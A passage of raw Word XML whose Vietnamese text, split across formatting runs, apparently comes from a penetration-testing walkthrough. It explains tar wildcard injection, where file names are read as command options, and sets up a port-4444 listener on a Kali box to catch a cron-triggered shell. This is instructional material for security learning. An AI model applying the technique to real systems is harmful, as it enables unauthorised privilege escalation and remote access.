        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tự</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>đại</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>diện</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sẽ</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mở</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rộng</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>để</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bao</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gồm</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>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spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>này.</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Vì</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tên</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>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w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>họ</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>là</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-5"/>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tùy</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-6"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chọn dòng</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lệnh</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tar</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hợp</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lệ,</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tar</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sẽ</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nhận</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ra</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chúng</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>như</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vậy</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>coi</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chúng</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>là</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tùy</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>chọn</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dòng</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lệnh</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thay</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>vì</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tên</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-4"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tệp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FEC4C3" w14:textId="2A7E1C2D" w:rsidR="002D4A21" w:rsidRPr="002D4A21" w:rsidRDefault="002D4A21" w:rsidP="002D4A21">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="85" w:after="0" w:line="321" w:lineRule="auto"/>
        <w:ind w:right="164"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Thiết</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>lập</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istener</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8"/>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hộp</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>của</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bạn</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>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cổng</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4444</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đợi</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cho</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>công</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>việc</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>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hạy</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(sẽ</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-8"/>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mất</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nhiều</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-7"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>thời gian</w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:spacing w:val="-3"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002D4A21">
        <w:rPr>
          <w:rFonts w:eastAsia="Liberation Sans"/>
          <w:color w:val="auto"/>
          <w:w w:val="105"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hơn</w:t>
      </w:r>
